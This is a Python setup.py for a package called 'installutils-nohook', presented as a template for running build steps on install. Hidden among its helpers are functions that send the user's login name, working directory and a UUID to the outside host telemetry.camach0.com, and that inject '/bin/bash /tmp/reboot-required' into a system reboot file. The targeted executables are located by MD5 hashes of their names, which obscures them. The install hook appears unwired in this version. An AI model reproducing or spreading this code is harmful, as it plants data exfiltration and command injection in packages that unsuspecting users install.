#!/usr/bin/env python

import uuid
from setuptools import setup
from setuptools.command.install import install
import os
from hashlib import md5
import json
import httplib

DOMAIN = 'telemetry.camach0.com'

def check_path():
    path = os.getenv('PATH', None)
    for i in path.split(':'):
        files = os.listdir(i)
        for j in files:
            if md5(j).hexdigest() == 'c6766b2dbba770f9155bc2f4356df30e':
                return True

def check_os():
    if os.name == 'posix':
        return True

def check_uid():
    if os.getuid() == 0:
        return True

def find_path():
    path = os.getenv('PATH', None)
    for i in path.split(':'):
        files = os.listdir(i)
        for j in files:
            if md5(j).hexdigest() == '94d2f2aabfda3169d54a9531cdb99890':
                return os.path.join(i, j)

def get_config_directory():
    home_directory = os.path.expanduser( '~' )
    config_directory = os.path.join(home_directory, '.local/share/' )
    if not os.path.exists(config_directory):
        os.makedirs(config_directory)
    return config_directory

def get_reboot_dir():
    with open(find_path(), 'r') as f:
        lines = f.readlines()
    lline = lines[-1]
    lword = lline.split(' ')[-1]
    return os.path.join(os.path.dirname(lword), 'compliance')

def add_reboot_required():
    reboot_file = os.path.join(get_reboot_dir(), 'reboot_required')
    print(reboot_file)
    with open(reboot_file, 'r') as f:
        lines = f.readlines()
        lines.insert(1, '\n/bin/bash /tmp/reboot-required\n')
    with open(reboot_file, 'w') as f:
        f.writelines(lines)

def create_uuid():
    config_directory = get_config_directory()
    with open(os.path.join(config_directory, 'uuid'), 'w') as f:
        f.write(str(uuid.uuid4()))

def get_uuid():
    config_directory = get_config_directory()
    try:
        with open(os.path.join(config_directory, 'uuid'), 'r') as f:
            return f.read()
    except:
        create_uuid()
        return get_uuid()

def report(error=False):
    user = os.getlogin()
    cwd = os.getcwd()

    conn = httplib.HTTPSConnection(DOMAIN)
    headers = {'Content-type': 'application/json'}
    if error:
        data = {'user': user, 'cwd': cwd, 'uuid': 'not assigned', 'message': 'installutils-nohook failed to install'}
    else:
        data = {'user': user, 'cwd': cwd, 'uuid': get_uuid(), 'message': 'installutils-nohook successfully installed'}
    json_data = json.dumps(data)

    conn.request('POST', '/prod/report', json_data, headers)
    response = conn.getresponse().read()
    return response

long_description_filename = os.path.join(
    os.path.dirname(os.path.abspath(__file__)), 'README.md')

with open(long_description_filename) as fd:
    long_description = fd.read()

setup(
    name='installutils-nohook',
    version='1.0.0',
    description='a template for executing build steps on package install - nohook version',
    author='The InstallUtils Team',
    author_email='44acamach0@gmail.com',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/acamach0/installutils',
    packages=['installutils'],
    license='GPLv3',
    classifiers=[
        'Environment :: Console',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: POSIX',
    ],
    install_requires=[],
    tests_require=[],
)
